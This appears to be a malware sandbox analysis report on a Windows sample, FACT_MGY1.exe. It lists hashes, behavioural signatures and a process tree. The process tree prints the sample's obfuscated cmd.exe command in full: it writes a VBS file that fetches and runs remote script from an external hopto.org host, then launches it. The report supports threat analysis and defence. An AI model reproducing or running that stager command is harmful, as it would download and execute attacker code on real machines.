Resubmissions (date, task id, score)
- 30-03-2023 14:20, 230330-rnhl9ada54, 8
- 30-03-2023 13:20, 230330-qk2qaacg74, 8
- 24-03-2023 22:33, 230324-2gz8tshg59, 8

Analysis
- max time kernel: 1021s
- max time network: 1024s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30-03-2023 13:20
Tasks
- static1 (static task)
- behavioral1 (behavioral task): sample FACT_MGY1.exe, resource win7-20230220-en
- behavioral2 (behavioral task): sample FACT_MGY1.exe, resource win10v2004-20230220-en
- behavioral3 (behavioral task): sample ~.exe, resource win7-20230220-en
General
- Target: FACT_MGY1.exe
- Size: 526KB
- MD5: f90662a63fcd773144ef809e09930b3f
- SHA1: 5196017f8f8127398c4fd4a0424a0871f20b4c89
- SHA256: 011c6518502cc9aec7dca14a808b1afa546233d528bd2ebf6485296e3dbd2541
- SHA512: 4cc4c3551e61a5228623d69167abe27a511cce6188294b374e71069a3ac7ece0d077801cfce32a936d1583941b71ce3ec64e086d6eea3b9b98c5c18616a10364
- SSDEEP: 3072:lV/611KEEbL6ETLPWkddkaW9N73oxiZOhAnGVRfN2Zndp9fN+3:IrKxTbfdkpIHVRf4nBfN+3
Malware Config
(none extracted)

Signatures
- Blocklisted process makes network request (3 IoCs)
  Processes: WScript.exe
  flow | pid | process
  26 | 3696 | WScript.exe
  28 | 3696 | WScript.exe
  30 | 3696 | WScript.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: cmd.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation | cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (1 IoC)
  Processes: cmd.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings | cmd.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: FACT_MGY1.exe, cmd.exe, cmd.exe, cmd.exe
  description | pid | process | target process
  PID 5084 wrote to memory of 2380 | 5084 | FACT_MGY1.exe | cmd.exe
  PID 5084 wrote to memory of 2380 | 5084 | FACT_MGY1.exe | cmd.exe
  PID 5084 wrote to memory of 2380 | 5084 | FACT_MGY1.exe | cmd.exe
  PID 2380 wrote to memory of 3312 | 2380 | cmd.exe | cmd.exe
  PID 2380 wrote to memory of 3312 | 2380 | cmd.exe | cmd.exe
  PID 2380 wrote to memory of 3312 | 2380 | cmd.exe | cmd.exe
  PID 3312 wrote to memory of 1584 | 3312 | cmd.exe | cmd.exe
  PID 3312 wrote to memory of 1584 | 3312 | cmd.exe | cmd.exe
  PID 3312 wrote to memory of 1584 | 3312 | cmd.exe | cmd.exe
  PID 1584 wrote to memory of 3696 | 1584 | cmd.exe | WScript.exe
  PID 1584 wrote to memory of 3696 | 1584 | cmd.exe | WScript.exe
  PID 1584 wrote to memory of 3696 | 1584 | cmd.exe | WScript.exe
Processes (process tree; the number is the depth in the tree, each entry is a child of the one above it)
1. C:\Users\Admin\AppData\Local\Temp\FACT_MGY1.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\FACT_MGY1.exe"
   Signatures: Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo g53=".":ip5=":":h187="/":GetObject("scripT"+ip5+"https"+ip5+"//curti23"+g53+"hopto"+g53+"org/g1")>%Public%\\ta30.vBs&&%ComSpec% /c start %Public%\\ta30.vBs"
      Signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\cmd.exe
         Command line: C:\Windows\system32\cmd.exe /V/D/c "echo g53=".":ip5=":":h187="/":GetObject("scripT"+ip5+"https"+ip5+"//curti23"+g53+"hopto"+g53+"org/g1")>C:\Users\Public\\ta30.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\\ta30.vBs"
         Signatures: Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c start C:\Users\Public\\ta30.vBs
            Signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\WScript.exe
               Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\ta30.vBs"
               Signatures: Blocklisted process makes network request
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Public\ta30.vBs
  Filesize: 99B
  MD5: 8f50a8481daef384086eb26f4ac87393
  SHA1: 81cdca33ef00915b7405973cd4eec8d3277ad2c7
  SHA256: 2a2886929768433030434a6c099a7f6ee24d3fd1feab8d6d8a715c436bd99c19
  SHA512: 32bcb7586fa076049c090817c8d8f762581d19dc6ba099b95d67394f03becb5fbfd5d41f72af81641ce17d33bd642fb3ee285544921807e6444cdd2f7d735bb4